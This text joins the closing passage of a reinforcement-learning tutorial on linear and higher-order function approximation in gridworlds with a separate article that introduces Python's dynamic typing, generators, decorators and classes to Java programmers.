not a line. Using only a line to discriminate between states can be very limited. Linear combination means that the parameters are linearly combined. We are not saying anything about the input features, which in fact may be represented by and high-order polynomial. Hopefully this distinction will be clear at the end of the post. In the linear approximator we model the state as a vector . This vector contains the current state values at time , these values are called features. There are different notations for the vector but the most common are and , I will use both these notations. The features can be the position of a robot, angular position and speed of an inverted pendulum, configurations of the stones in a Go game, etc. Here I define also as the vector of weights (or parameters) of our linear approximator, having the same number of elements of . Now we have two vectors and we want to use them in a linear function. How to do it? Simple, we have to perform the dot product between and as follows: If you are not used to linear algebra notation don’t get scared. This is equivalent to the following sum: where is the total number of features. Geometrically this solution is represented by a line (in two-dimensional space), a plane (in a three-dimensional space), or an hyper-plane (in hyper-spaces). Now we know the content of the black box, which is given by the product of the vectors and . However in order to apply the method described in the previous section we still need the error measure, the update rule and the target. Using the MSE we can write the error measure as follows: Using the TD(0) definition we can define the target as follows: The update rule defined previously can be reused here as well, however we have to introduce the reward and the discount factor gamma as required by the reinforcement learning definition: Great, we have almost all we need. I said almost because a last piece is missing. The update rule requires the gradient . How to find it? It turns out that the gradient of the linear approximator simplify to a very nice form. First of all, based on the previous definitions we can rewrite the gradient as follows: now we have to find the partial derivatives of the function approximator with respect to each single weight . For each unknown we have to find the derivative considering the other unknowns as constants. For instance, the partial derivative of the first unknown is simply because all the other values are considered constant values and the derivative of a constant is zero: Applying the same process to all the other weights we end up with the following gradient vector: That’s it. The gradient is the input vector . Now we can rewrite the update rule as follows: Great, this is the final form of the update rule for the linear approximator. We have all we need now. Let’s get the party started! Application: gridworld (and the bias) Let’s suppose we have a square gridworld where charging stations (green cells) and stairs (red cells) are disposed in multiple locations. The position of the positive and negative cells can vary giving rise to four worlds which I called: OR-world, AND-world, NAND-world, XOR-world. The rule of the worlds are similar to the one defined in the previous posts. The robot has four action available: forward, backward, left, right. When an action is performed, with a probability of 0.2 it can lead to a wrong movement. The reward is positive (+1.0) for green cells, negative (-1.0) for red cells, and null in all the other cases. The index convention for the states is the usual (column, row) where (0,0) represents the cell in the bottom-left corner and (4,4) the cell in the top-right corner. If you are familiar with Boolean algebra you have already noticed that there is a pattern in the worlds which reflects basic Boolean operations. From the geometrical point of view, when we apply a linear approximator to the boolean worlds, we are trying to find a plane in a three-dimensional space which can discriminate between states with high utility (green cells) and states with low utility (red cells). In the three-dimensional space the x-axis is represented by the columns of the world, whereas the y-axis is represented by the rows. The utility value is given by the z-axis. During the gradient descent we are changing the weights, adjusting the inclination of the plane and the utilities associated to each state. To better understand this point you can plug the equation in Wolfram Alpha and give a look to the resulting plot. Changing the coefficients associated to and you are changing the weights associated to those features and you are in fact moving the plane. Try again with or click here if you are lazy. The python implementation is based on a random agent which freely move in the world. Here we are only interested in estimating the state utilities, we do not want to find a policy. The core of the code is the update rule defined in the previous section, summarised in a few lines thanks to Numpy: def update(w, x, x_t1, reward, alpha, gamma, done): '''Return the updated weights vector w_t1 @param w the weights vector before the update @param x the feauture vector obsrved at t @param x_t1 the feauture vector observed at t+1 @param reward the reward observed after the action @param alpha the ste size (learning rate) @param gamma the discount factor @param done boolean True if the state is terminal @return w_t1 the weights vector at t+1 ''' if done: w_t1 = w + alpha * (reward - np.dot(x,w)) * x) else: w_t1 = w + alpha * ((reward + (gamma*(np.dot(x_t1,w))) - np.dot(x,w)) * x) return w_t1 The function numpy.dot() is an implementation of the dot product. The conditional statement is used to discriminate between terminal ( done=True) and non-terminal ( done=False) states. In case of a terminal state the target is obtained using only the reward. This is obvious, because after a terminal state there is not another state to use for approximating the target. You can check the complete code on the official GitHub repository of the series, the python script is called boolean_worlds_linear_td.py. In my experiments I set the learning rate and I linearly decrease it to for iterations. The weights were randomly initialised in the range . Using matplotlib I draw the planes generated for the worlds in a three-dimensional plot: The surface of the plane is the utility value returned by the linear approximator. The utility should be -1 in proximity of a red cell, and +1 in proximity of a green cell. However, examining the plot we can notice that something strange is happening. The planes are flat and the resulting utility is always close to zero in all the worlds but the OR-world. It seems that the approximator is not working at all and that its output is always null. What is going on? Our current definition of approximator does not take into account an important factor, the translation of the plane. Having only two weights we can rotate the surface on the xy-plane but we cannot translate it up and down. This problem becomes clear if you think about the cell (0,0) of the gridworld. The input vector of this cell is . Given this input, no matter which value we choose for the weights, when we perform the dot product we are going to end up with an utility of zero. From the geometric point of view the plane can be rotated but it is constrained to pass through the point (0,0). For example, in the AND-world the constraint in (0,0) is particularly disturbing. The optimisation cannot adjust to 1.0 the utility in (4,4) because it will get an higher error for the other two red cells in (0,4) and (4,0). The best thing to do is to keep the plane flat. A similar reasoning can be applied to the other worlds. Only in the OR-world it is possible to adjust the inclination and satisfy all the constraints. How can we fix this issue? We have to introduce the bias unit. The bias unit can be represented as an additional input which is always equal to 1. Using the bias unit the input vector becomes with . At the same time we have to add an additional value in the weight vector . The additional weight is updated similarly to the others. Using again Wolfram Alpha you can see what is the effect of plugging a bias of one in our usual equation , and the difference with respect to the same equation with a bias of zero . I run again the script boolean_worlds_linear_td.py setting the variable use_bias=True and using the same hyper-parameters as before, obtaining the following plot: The result is much better! The planes are no more flat, because introducing the bias we gave the possibility to shift up and down. Now the planes can be adjusted to fit all the constraints. The script will also print the weight vector and the utilities returned by this approximator: ------AND-world------ w: [ 0.12578254 0.12194905 -0.71257655] [[-0.21 -0.09 0.03 0.16 0.28] [-0.34 -0.21 -0.09 0.03 0.15] [-0.46 -0.34 -0.22 -0.1 0.03] [-0.59 -0.46 -0.34 -0.22 -0.1 ] [-0.71 -0.59 -0.47 -0.35 -0.22]] ------NAND-world------ w: [-0.12242233 -0.12346582 0.71111163] [[ 0.22 0.1 -0.03 -0.15 -0.27] [ 0.34 0.22 0.1 -0.03 -0.15] [ 0.47 0.34 0.22 0.1 -0.03] [ 0.59 0.47 0.34 0.22 0.09] [ 0.71 0.59 0.46 0.34 0.22]] ------OR-world------ w: [ 0.12406486 0.11832163 -0.26037356] [[ 0.24 0.35 0.47 0.59 0.71] [ 0.11 0.23 0.35 0.47 0.59] [-0.01 0.11 0.22 0.34 0.46] [-0.14 -0.02 0.1 0.22 0.34] [-0.26 -0.14 -0.02 0.09 0.21]] ------XOR-world------ w: [ 0.00220366 -0.00094763 0.00044972] [[ 0.01 0.01 0.01 0.01 0.01] [ 0.01 0.01 0.01 0. 0. ] [ 0. 0. 0. 0. 0. ] [ 0. 0. 0. -0. -0. ] [ 0. -0. -0. -0. -0. ]] The utility matrix printed on terminal is obtained computing the output of the linear approximator for each state of the gridworld. In Numpy the state (0,0) is the element in the top left corner and it can be hard to read when printing the matrix. For this reason the matrix has been vertically flipped in order to match the values with the cells of the gridworld. Giving a look to the utilities we can see that in most of the worlds they are pretty good. For instance, in the AND-world we should have an utility of -1.0 for the state (0,0). The approximator returned an utility of -0.71 (bottom-left element in the matrix). On the other two red cells the values are -0.21 and -0.22 which are not so close to -1.0 but are at least negative. The positive cell in state (4,4) has an utility of 1.0 and the approximator returned 0.28. At this point it should be clear why having a function approximator is a big deal. With the lookup table approach we could represent the utilities of the boolean worlds using a table with 5 rows and 5 columns, for a total of 25 variables to keep in memory. Now we only need two weights and a bias, for a total of 3 variables. Everything seems fine, we have an approximator which works pretty well and is easy to tune. However our problems are not finished. If you look to the XOR-world you will notice that the plane is still flat. This problem is much serious than the previous one and there is no way to solve it. There is no plane that can separate red and green cells in the XOR-world. Try it yourself, adjust the plane to satisfy all the constraints. That is not feasible. The XOR-world is not linearly separable, and using a linear approximator we can only approximate linearly separable functions. The only chance we have to approximate an utility function for the XOR-world is to literally bend the plane, and to do it we have to use an higher order approximator. High-order approximators The linear approximator is the simplest form of approximation. The linear case is appealing not only for its simplicity but also because it is guaranteed to converge. However, there is an important limit implicit in the linear model: it cannot represent complex relationships between features. That’s it, the linear form does not allow representing the interaction between features. Such a complex interaction naturally arise in physical systems. Some features may be informative only when other features are absent. For example, the inverted pendulum angular position and velocity are tightly connected. A high angular velocity may be either good or bad depending on the position of the pole. If the angle is high then high angular velocity means an imminent danger of falling, whereas if the angle is low then high angular velocity means the pole is righting itself. Solving the XOR problem is very easy when an additional feature is added. If you look to the equation what I added is the new term . This term introduces a relationship between the two features and . Now the surface represented by the equation is no more a plane but an hyperbolic paraboloid, a saddle-like surface which perfectly adapt to the XOR-world. We do not need to rewrite the update function because it remains unchanged. We always have a linear combination of features and the gradient is always equal to the input vector. In the repository you will find another script called xor_paraboloid.py containing an implementation of this new approximator. Running the script with the same parameters used for the linear case we end up with the following plot: Here the paraboloid is represented using four different perspectives. The result obtained at the end of the training shows that the utilities are very good. w: [ 0.36834857 0.36628493 -0.18575494 -0.73988694] [[ 0.73 0.36 -0.02 -0.4 -0.77] [ 0.37 0.17 -0.02 -0.21 -0.4 ] [-0. -0.01 -0.01 -0.02 -0.02] [-0.37 -0.19 -0.01 0.17 0.35] [-0.74 -0.37 -0.01 0.36 0.73]] We should have -1 in the bottom-left and top-right corners, the approximator returned -0.74 and -0.77 which are pretty good estimations. Similar results have been obtained for the positive states in the top-left and bottom-right corners, where the approximator returned 0.73 and 0.77 which are very close to the true utility of 1.0. I suggest you to run the script using different hyper-parameters (e.g. the learning rate alpha) to see the effects on the final plot and on the utility table. The geometrical intuition is helpful because it gives an immediate intuition of the different approximators. We saw that using additional features and more complex functions it is possible to better describe the utility space. High-order approximators may find useful links between futures whereas a pure linear approximator could not. An example of high-order approximator is the quadratic approximator. In the quadratic approximator we use a second order polynomial to model the utility function. It is not easy to choose the right polynomial. A simple approximator like the linear one can miss the relevant relations between features and target, whereas an high order approximator can fail to generalise to new unseen states. The optimal balance is achieved through a delicate tradeoff known in machine learning as the bias-variance tradeoff. Conclusions In this post I introduced function approximation and we saw how to build a methodology based on an error measure, an update rule, and a target. This methodology is extremely flexible and we are going to use it again in future posts. Moreover I introduced linear methods, which are the simplest approximators. Linear function approximation is limited because it cannot capture important relationships between features. Using an high-order polynomial can often solve the problem but is still a limited approach because modelling the relationship between features remain a design choice. In complex physical systems multiple elements are interacting and it will be difficult to find the right polynomial that may describe those relationships. How to solve this problem? We can use non-linear function approximators. In the next post I will introduce neural networks and show you how to use it in reinforcement learning. Index - [First Post] Markov Decision Process, Bellman Equation, Value iteration and Policy Iteration algorithms. - [Second Post] Monte Carlo Intuition, Monte Carlo methods, Prediction and Control, Generalised Policy Iteration, Q-function. - [Third Post] Temporal Differencing intuition, Animal Learning, TD(0), TD(λ) and Eligibility Traces, SARSA, Q-learning. - [Fourth Post] Neurobiology behind Actor-Critic methods, computational Actor-Critic methods, Actor-only and Critic-only methods. - [Fifth Post] Evolutionary Algorithms introduction, Genetic Algorithm in Reinforcement Learning, Genetic Algorithms for policy selection. - [Sixt Post] Reinforcement learning applications, Multi-Armed Bandit, Mountain Car, Inverted Pendulum, Drone landing, Hard problems. - [Seventh Post] Function approximation, Intuition, Linear approximator, Applications, High-order approximators. Resources The complete code for the Reinforcement Learning Function Approximation is available on the dissecting-reinforcement-learning official repository on GitHub. Reinforcement learning: An introduction (Chapter 8 ‘Generalization and Function Approximation’) Sutton, R. S., & Barto, A. G. (1998). Cambridge: MIT press. [html] References Bowers, J. S. (2009). On the biological plausibility of grandmother cells: implications for neural network theories in psychology and neuroscience. Psychological review, 116(1), 220. Gross, C. G., Rocha-Miranda, C. E. D., & Bender, D. B. (1972). Visual properties of neurons in inferotemporal cortex of the Macaque. Journal of neurophysiology, 35(1), 96-111. Gross, C. G. (2002). Genealogy of the “grandmother cell”. The Neuroscientist, 8(5), 512-518. Hinton, G. E. (1984). Distributed representations. Plaut, D. C., & McClelland, J. L. (2010). Locating object knowledge in the brain: Comment on Bowers’s (2009) attempt to revive the grandmother cell hypothesis.
https://mpatacchiola.github.io/blog/2017/12/11/dissecting-reinforcement-learning-7.html
CC-MAIN-2018-34
refinedweb
6,477
54.63
Hi I am trying to read a file and then print out information about that file using a function. Here is the code i have so far: Code:#include <iostream> #include <fstream> #include <string> using namespace std; ifstream in; void NoOfChars(); int main() { string file; cout << "Enter the file name you wish to open: " << endl; cin >> file; cout << "The file you wish to open is: " << file <<endl; in.open(file); if (in.fail()) { cout << "File failed to open" << endl; } // Then print out the information here cout<<"Number of Chars: "<< NoOfChars(in)<<endl; } void NoOfChars() { //Function code here return chars; } My question is, do i have the right idea? Thanks
http://cboard.cprogramming.com/cplusplus-programming/135488-reading-file.html
CC-MAIN-2014-10
refinedweb
109
79.43
Navigation trail: TurbineProjectPages - JakartaTurbine2 - JakartaTurbine2Faq - CommonIntakeProblems Common Intake Problems Below are common problems and solutions encountered when first using Intake. - Make sure that you have read the intake service and intake howto completely. - Also, check the mailing list archives. Intake is one of the most talked about services on the turbine-user list. - Please note that the version of Intake provided with Turbine 2.3 does a much better job of giving you more specific error messages when a problem occurs. Nevertheless, Intake in 2.2 works very well and saves you lots of time! It is easily worth the time spent learning how to use it. Q: Intake won't run, and I am using sdk 1.4 A: If you have turbine running under sdk 1.4, try recompiling the turbine src with the java version you are using. Also, fixed in Turbine 2.3 Q: Why does <code>$intake.MyGroup.mapTo($myobject)</code> not populate the form fields? A: Assuming you have your group configured and the $intake tool enabled, does your target object ({ { { MyObject } } }) implement the org.apache.turbine.om.Retrievable interface? Putting something like the following ought to work: public class MyObject extends BaseMyObject implements Retrievable { {{{ private String querykey = null; public String getQueryKey() { if(querykey == null) { setQueryKey(getPrimaryKey().toString()); } return querykey; } public void setQueryKey(String arg) { querykey = arg; } } - }}} You may wonder why your Torque-generated object don't already do this? This is because Torque is a separate project from Turbine, and it would be improper for Torque generated objects to implement an interface from the Turbine project. So you must do it manually, and be glad that it is easy to do. == A Beginners Experience With Intake == Introduction This will be sort of a work in progress section for me, after all the help I have recieved from the community on the user list I thought it was only fair to document it on the wiki. So as I get different aspects of my intake service to work I will try and post them here. Regards, Stuart Townhill. My Setup - TDK2.2. - Ant1.5.1. - Maven v. 1.0-beta-7. - Mysql Ver11.18. - Win XP Professional Version 2002 Service Pack 1. - JDK1.4.1. Intake Setup Uncomment the following lines from TurbineResources.properties (<TDK ROOT>/webapps/<APPNAME>/WEB-INF/build). services.IntakeService.classname=org.apache.turbine.services.intake.Turb ineIntakeService (intake service). tool.request.intake=org.apache.turbine.services.intake.IntakeTool (intake pull tool used to connect your template with the intake service). Problems Encountered First Problem At first I could never get intake to initalise. The answer to this is an elaboration of the first question on this page. Basically it is my understanding that the turbine2-2.jar (<TDK ROOT>/webapps/<APPNAME>/WEB-INF/lib) was built using JDK1.3.1 and therfore may not work correctly with JDK1.4.1. Solution *I downloaded the following file () and used Maven to build a new jar file therfore using the JDK installed on my machine which solved the problem (but not for long). Second Problem As soon as I solved the first problem it seemed to trigger another problem. As soon as I browsed to my app (<APPNAME>/servlet<APPNAME> ) I recieved an error to the tune of (Horrible Exception: java.lang.NoClassDefFoundError:org/apache/regexp/RESyntaxException). Solution *I had to add the following file (regexp-1.2.jar) to my (<TDK ROOT>/webapps/<APPNAME>/WEB-INF/lib). I found this file located in (<TDK ROOT>/server/lib). Getting My First Instance Of Intake Working Comming soon!
http://wiki.apache.org/jakarta/JakartaTurbine2Faq/CommonIntakeProblems?highlight=MyGroup
CC-MAIN-2014-52
refinedweb
595
50.33
Python for Java People Editor’s Note: Being in a Java channel, most of us know the language very well and have been in its ecosystem for at least a couple of years. This gives us routine and expertise but it also induces a certain amount of tunnel vision. In the series Outside-In Java non-Javaists will give us their perspective of our ecosystem. Table of Contents Philosophically, Python is almost a polar opposite to Java. It forgoes static types and rigid structure in favor of a loose sandbox, within which you’re free to do basically whatever you want. Perhaps Python is about what you can do, whereas Java is about what you may do. And yet both languages still share a great deal of inspiration tracing back to C. They’re both imperative languages with blocks, loops, functions, assignment, and infix math. Both make heavy use of classes, objects, inheritance, and polymorphism. Both feature exceptions fairly prominently. Both handle memory management automatically. They even both compile to bytecode that runs on a VM, though Python compiles transparently for you. Python even took a few cues from Java — the standard library’s logging and unittest modules are inspired by log4j and JUnit, respectively. Given that overlap, I think Java developers ought to feel reasonably at home with Python. And so I come to you bearing some gentle Python propaganda. If you’ll give me a chance, I can show you what makes Python different from Java, and why I find those differences appealing. At the very least, you might find some interesting ideas to take back to the Java ecosystem. (If you want a Python tutorial, the Python documentation has a good one. Also, this is from a Python 3 perspective! Python 2 is still fairly common in the wild, and it has a few syntactic differences.) Syntax Let’s get this out of the way first. Here’s hello world: print("Hello, world!") Hm, well, that’s not very enlightening. Okay, here’s a function to find the ten most common words in a file. I’m cheating a little by using the standard library’s Counter type, but it’s just so good. from collections import Counter def count_words(path): words = Counter() with open(path) as f: for line in f: for word in line.strip().split(): words[word] += 1 for word, count in words.most_common(10): print(f"{word} x{count}") Python is delimited by whitespace. People frequently have strong opinions about this. I even thought it was heretical when I first saw it. Now, a decade or so later, it seems so natural that I have a hard time going back to braces. If you’re put off by this, I doubt I can convince you otherwise, but I urge you to overlook it at least for a little while; it really doesn’t cause any serious problems in practice, and it eliminates a decent bit of noise. Plus, Python developers never have to argue about where a { should go. Beyond that aesthetic difference, most of this ought to look familiar. We’ve got some numbers, some assignment, and some method calls. The import statement works a little differently, but it has the same general meaning of “make this thing available”. Python’s for loop is very similar to Java’s for-each loop, only with a bit less punctuation. The function itself is delimited with def instead of a type, but it works how you’d expect: it can be called with arguments and then return a value (though this one doesn’t). Only two things are really unusual here. One is the with block, quite similar to Java 7’s “ try-with-resources” — it guarantees the file will be closed at the end of the block, even if an exception is raised within it. The other is the f"..." syntax, a fairly new feature that allows interpolating expressions directly into strings. And that’s it! You’ve already read some Python. At the very least, this isn’t a language from a totally different planet. Dynamic typing It’s probably obvious from that example, but Python code doesn’t have a lot of types sprinkled around. Not on variable declarations, not on argument or return types, not on the layout of an object. Anything can be any type at any time. I haven’t shown a class definition yet, so here’s a trivial one. class Point: def __init__(self, x, y): self.x = x self.y = y def magnitude(self): return (self.x ** 2 + self.y ** 2) ** 0.5 point = Point(3, 4) print(point.x) # 3 print(point.magnitude()) # 5.0 Even the x and y aren’t declared as attributes; they only exist because the constructor created them. Nothing forced me to pass in integers. I could’ve passed in floats, or perhaps Decimals or Fractions. If you’ve only used static languages, this might sound like chaos. Types are warm and cozy and comforting. They guarantee… well, perhaps not that the code actually works (though some would disagree), but something. How can you rely on code when you don’t even know that anything’s the correct type? But wait — Java has no such guarantee either! After all, any object might be null, right? That’s virtually never an object of the correct type. You might think of dynamic typing as a complete surrender to the null problem. If we have to deal with it anyway, we might as well embrace it and make it work for us — by deferring everything to run time. Type errors become normal logic errors, and you deal with them the same way. (For the opposite approach, see Rust, which has no null value — or exceptions. I’d still rather write Python, but I appreciate that Rust’s type system isn’t always quietly lying to me.) In my magnitude method, it doesn’t matter that self.x is an int or a float or any kind of number at all. It only needs to support the ** operator and return something that supports the + operator. (Python supports operator overloading, so this could be potentially anything.) The same applies to normal method calls: any type is acceptable, as long as it works in practice. That means Python has no need for generics; everything already works generically. No need for interfaces; everything is already polymorphic with everything. No downcasts, no upcasts, no escape hatches in the type system. No running into APIs requiring a List when they could work just as well with any Iterable. A number of common patterns become much easier. You can create wrapper objects and proxies without needing to change consuming code. You can use composition instead of inheritance to extend a third-party type — without needing to do anything special to preserve polymorphism. A flexible API doesn’t require duplicating every class as an interface; everything already acts as an implicit interface. The dynamic typing philosophy With static typing, whoever writes some code gets to choose the types, and the compiler checks that they’ll work. With dynamic typing, whoever uses some code gets to choose the types, and the runtime will give it a try. Here’s that opposing philosophy in action: the type system focuses on what you can do, not what you may do. Using dynamic typing this way is sometimes called “duck typing”, in the sense that “if it walks like a duck and it quacks like a duck, it’s a duck.” The idea is that if all you want is something that quacks, then instead of statically enforcing that your code must receive a duck, you take whatever you’re given and ask it to quack. If it does, that’s all you cared about anyway, so it’s just as good as a duck. (If it can’t, you’ll get an AttributeError, but that’s not very punchy.) Do note, too, that Python is still strongly typed. The term is a little fuzzy, but it generally means that values preserve their types at run time. The typical example is that Python won’t let you add a string to a number, whereas a weakly-typed language like JavaScript would silently convert one type to the other, using precedence rules that may not match your expectations. Unlike a lot of dynamic languages, Python errs on the side of catching mistakes early — at run time, anyway. For example, reading from a variable that doesn’t yet exist will raise an exception, as will reading a nonexistent key from a dict (like a Map). In JavaScript, Lua, and similar languages, you’d silently get a null value in both cases. (Even Java returns null for missing Map keys!) If you want to fall back to a default, dicts have methods for expressing that more explicitly. There’s definitely a tradeoff here, and whether it’s worth it will differ by project and by person. For me, at least, it’s easier to settle on a firm design for a system after I see it in action, but a statically typed language expects a design upfront. Static typing makes it harder to try out a lot of different ideas, harder to play. You do have fewer static guarantees, but in my experience, most type errors are caught right away… because the first thing I do after writing some code is try to run it! Any others should be caught by your tests — which you should be writing in any language, and which Python makes relatively easy. A hybrid paradigm Both Python and Java are imperative and object-oriented: they work by executing instructions, and they model everything as objects. In recent releases, Java has been adding some functional features, to much hurrah, I assume. Python also has its fair share of functional features, but… the approach is somewhat different. It offers a few token builtins like map and reduce, but it’s not really designed around the idea of chaining lots of small functions together. Instead, Python mixes in… something else. I don’t know of any common name for the approaches Python takes. I suppose it split the idea of “chaining functions” into two: working with sequences, and making functions themselves more powerful. Sequences Sequences and iteration play a significant role in Python. Sequences are arguably the most fundamental data structure, so tools for working with them are very nice to have. I interpret this as Python’s alternative to functional programming: instead of making it easier to combine a lot of small functions and then apply them to sequences, Python makes it easier to manipulate sequences with imperative code in the first place. Way back at the beginning, I casually dropped in this line: for word, count in words.most_common(10): A for loop is familiar enough, but this code iterates over two variables at a time. What’s actually going on is that each element in the list most_common returns a tuple, a group of values distinguished by order. Tuples can be unpacked by assigning them to a tuple of variable names, which is what’s really happening here. Tuples are commonly used to return multiple values in Python, but they’re occasionally useful in ad-hoc structures as well. In Java, you’d need an entire class and a couple lines of assigning stuff around. Anything that can be iterated over can also be unpacked. Unpacking supports arbitrary nesting, so a, (b, c) = ... does what it looks like. For sequences of unknown length, a *leftovers element can appear anywhere and will soak up as many elements as necessary. Perhaps you really like LISP? values = [5, 7, 9] head, *tail = values print(head) # 5 print(tail) # (7, 9) Python also has syntax for creating lists out of simple expressions — so-called “list comprehensions” — which are much more common than functional approaches like map. Similar syntax exists for creating dicts and sets. Entire loops can be reduced to a single expression that emphasizes what you’re actually interested in. values = [3, 4, 5] values2 = [val * 2 for val in values if val != 4] print(values2) # [6, 10] The standard library also contains a number of interesting iterables, combinators, and recipes in the itertools module. Finally, Python has generators for producing lazy sequences with imperative code. A function containing the yield keyword, when called, doesn’t execute immediately; instead it returns a generator object. When the generator is iterated over, the function runs until it encounters a yield, at which point it pauses; the yielded value becomes the next iterated value. def odd_numbers(): n = 1 while True: yield n n += 2 for x in odd_numbers(): print(x) if x > 4: break # 1 # 3 # 5 Because generators run lazily, they can produce infinite sequences or be interrupted midway. They can yield a lot of large objects without consuming gobs of memory by having them all live at once. They also work as a general alternative to the “chained” style of functional programming. Instead of combining maps and filters, you can write familiar imperative code. # This is the pathlib.Path API from the standard library def iter_child_filenames(dirpath): for child in dirpath.iterdir(): if child.is_file(): yield child.name To express a completely arbitrary lazy iterator in Java, you’d need to write an Iterator that manually tracks its state. For all but the simplest cases, that can get pretty hairy. Python has an iteration interface as well, so you can still use this approach, but generators are so easy to use that most custom iteration is written with them. And because generators can pause themselves, they’re useful in a few other contexts. By advancing the generator manually (instead of merely iterating it all at once with a for loop), it’s possible to run a function partway, have it stop at a certain point, and run other code before resuming the function. Python leveraged this to add support for asynchronous I/O (non-blocking networking without threads) purely as a library, though now it has dedicated async and await syntax. Functions At a glance, Python functions are pretty familiar. You can call them with arguments. The passing style is exactly the same as in Java — Python has neither references nor implicit copying. Python even has “docstrings”, similar to Javadoc comments, but built into the syntax and readable at run time. def foo(a, b, c): """Print out the arguments. Not a very useful function, really.""" print("I got", a, b, c) foo(1, 2, 3) # I got 1 2 3 Java has variadic functions with args... syntax; Python has much the same using *args. (The *leftovers syntax for unpacking was inspired by the function syntax.) But Python has a few more tricks up its sleeve. Any argument can have a default value, making it optional. Any argument can also be given by name — I did this earlier with Point(x=3, y=4). The *args syntax can be used when calling any function, to pass a sequence as though it were individual arguments, and there’s an equivalent **kwargs that accepts or passes named arguments as a dict. An argument can be made “keyword-only”, so it must be passed by name, which is very nice for optional bools. Python does not have function overloading, of course, but most of what you’d use it for can be replaced by duck typing and optional arguments. The stage is now set for one of Python’s most powerful features. In much the same way as dynamic typing lets you transparently replace an object by a wrapper or proxy, *args and **kwargs allow any function to be transparently wrapped. def log_calls(old_function): def new_function(*args, **kwargs): print("i'm being called!", args, kwargs) return old_function(*args, **kwargs) return new_function @log_calls def foo(a, b, c=3): print(f"a = {a}, b = {b}, c = {c}") foo(1, b=2) # i'm being called! (1,) {'b': 2} # a = 1, b = 2, c = 3 That’s a bit dense, sorry. Don’t worry too much about exactly how it works; the gist is that foo gets replaced by a new_function, which forwards all its arguments along to foo. Neither foo nor the caller need to know that anything is any different. I cannot understate how powerful this is. It can be used for logging, debugging, managing resources, caching, access control, validation, and more. It works very nicely in tandem with the other metaprogramming features, and in a similar vein, it lets you factor out structure rather than just code. Objects and the dynamic runtime A dynamic runtime is a runtime — the stuff behind the scenes that powers core parts of the language — that can be played with at run time. Languages like C or C++ very much do not have dynamic runtimes; the structure of the source code is “baked” into the compiled output, and there’s no sensible way to change its behavior later on. Java, on the other hand, does have a dynamic runtime! It even comes with a whole package devoted to reflection. Python has reflection too, of course. There are number of simple functions built right in for inspecting or modifying objects’ attributes on the fly, which is incredibly useful for debugging and the occasional shenanigans. But Python takes this a little bit further. Since everything is done at run time anyway, Python exposes a number of extension points for customizing its semantics. You can’t change the syntax, so code will still look like Python, but you can often factor out structure — something that’s very difficult to do in a more rigid language. For an extreme example, have a look at pytest, which does very clever things with Python’s assert statement. Normally, writing assert x == 1 would simply throw an AssertionError when false, leaving you with no context for what went wrong or where. That’s why Python’s built-in unittest module — like JUnit and many other testing facilities — provides a pile of specific utility functions like assertEquals. Unfortunately, these make tests somewhat wordier and harder to read at a glance. But with pytest, assert x == 1 is fine. If it fails, pytest will tell you what x is… or where two lists diverge, or what elements are different between two sets, or whathaveyou. All of this happens automatically, based on the comparison being done and the types of the operands. How does pytest work? You really don’t want to know. And you don’t have to know to write tests with pytest — and have a blast doing it. That’s the real advantage of a dynamic runtime. You, personally, may not make use of these features. But you can reap great benefits from libraries that use them without caring about how they work. Even Python itself implements a number of extra features using its own extension points — no changes required to the syntax or interpreter. Objects My favorite simple example is attribute access. In Java, a Point class might opt for getX() and setX() methods instead of a plain x attribute. The reasoning is that if you ever need to change how x is read or written, you can do so without breaking the interface. In Python, you don’t need to worry about that upfront, because you can intercept attribute access if necessary. class Point: def __init__(self, x, y): self._x = x self._y = y @property def x(self): return self._x # ... same for y ... point = Point(3, 4) print(point.x) # 3 The funny @property syntax is a decorator, which looks like a Java annotation, but can more directly modify a function or class. Reading point.x now calls a function and evaluates to its return value. This is completely transparent to calling code — and indistinguishable from any other attribute read — but the object can intervene and handle it however it likes. Unlike Java, attribute access is part of a class’s API and freely customizable. (Note that this example also makes x read-only, because I didn’t specify how to write to it! The syntax for a writable property is a little funny-looking, and how it works doesn’t matter here. But you could trivially, say, enforce that only odd numbers can be assigned to point.x.) Similar features exist in other static languages like C#, so perhaps this isn’t so impressive. The really interesting part about Python is that property isn’t special at all. It’s a normal built-in type, one that could be written in less than a screenful of pure Python. It works because a Python class can customize its own attribute access, both generally and per-attribute. Wrappers and proxies and composition are easy to implement: you can forward all method calls along to the underlying object without having to know what methods it has. The same hooks property uses could be used for a lazy-loading attribute or an attribute that automatically holds a weak reference — completely transparent to calling code, and all from pure Python. You’ve probably noticed by now that my code has no public or private modifiers, and indeed, Python has no such concepts. By convention, a single leading underscore is used to mean “private-ish” — or perhaps more accurately, “not intended as part of a stable public API”. But this has no semantic meaning, and Python itself doesn’t stop anyone from inspecting or changing such an attribute (or calling it, if it’s a method). No final or static or const, either. This is that same philosophy at work: core Python isn’t usually in the business of preventing you from doing anything. And when you need it, it’s very useful. I’ve patched around bugs in third-party libraries by calling or overriding or even outright redefining private methods at startup time. It saves me from having to create a whole local fork of the project, and once the bug is fixed upstream, I simply delete my patch code. In a similar vein, you can easily write tests for code that depends on external state — say, the current time. If refactoring is impractical, you could replace time.time() with a dummy function for the duration of the test. Library functions are just attributes of modules (like Java packages), and Python modules are objects like anything else, so they can be inspected and modified in the same ways. Classes A Java class is backed by a Class object, but the two aren’t quite interchangeable. For a class Foo, the class object is Foo.class. I don’t think Foo can be used usefully on its own, because it names a type, and Java makes some subtle distinctions between types and values. In Python, a class is an object, an instance of type (which is itself an object, and thus an instance of itself, which is fun to think about.) Classes can thus be treated like any other value: passed as arguments, stored in larger structures, inspected, or manipulated. The ability to make dicts whose keys are classes is especially useful at times. And because classes are instantiated simply by calling them — Python has no new keyword — they can be interchanged with simple functions in many cases. Some common patterns like factories are so simple that they almost vanish. # Wait, is Vehicle a class or a factory function? Who cares! # It could even be changed from one to the other without breaking this code. car = Vehicle(wheels=4, doors=4) Several times now, I’ve put functions and even regular code at top-level, outside of any class. That’s allowed, but the implications are a little subtle. In Python, even the class and def statements are regular code that execute at run time. A Python file executes from the top down, and class and def aren’t special in that regard. They’re just special syntax for creating certain kinds of objects: classes and functions. Here’s the really cool part. Because classes are objects, and their type is type, you can subclass type and change how it works. Then you can make classes that are instances of your subclass. That’s a little weird to wrap your head around at first. But again, you don’t need to know how it works to benefit from it. For example, Python has no enum block, but it does have an enum module: class Animal(Enum): cat = 0 dog = 1 mouse = 2 snake = 3 print(Animal.cat) # <Animal.cat: 0> print(Animal.cat.value) # 0 print(Animal(2)) # <Animal.mouse: 2> print(Animal['dog']) # <Animal.dog: 1> The class statement creates an object, which means it calls a constructor somewhere, and that constructor can be overridden to change how the class is built. Here, Enum creates a fixed set of instances rather than class attributes. All of it is implemented with plain Python code and normal Python syntax. 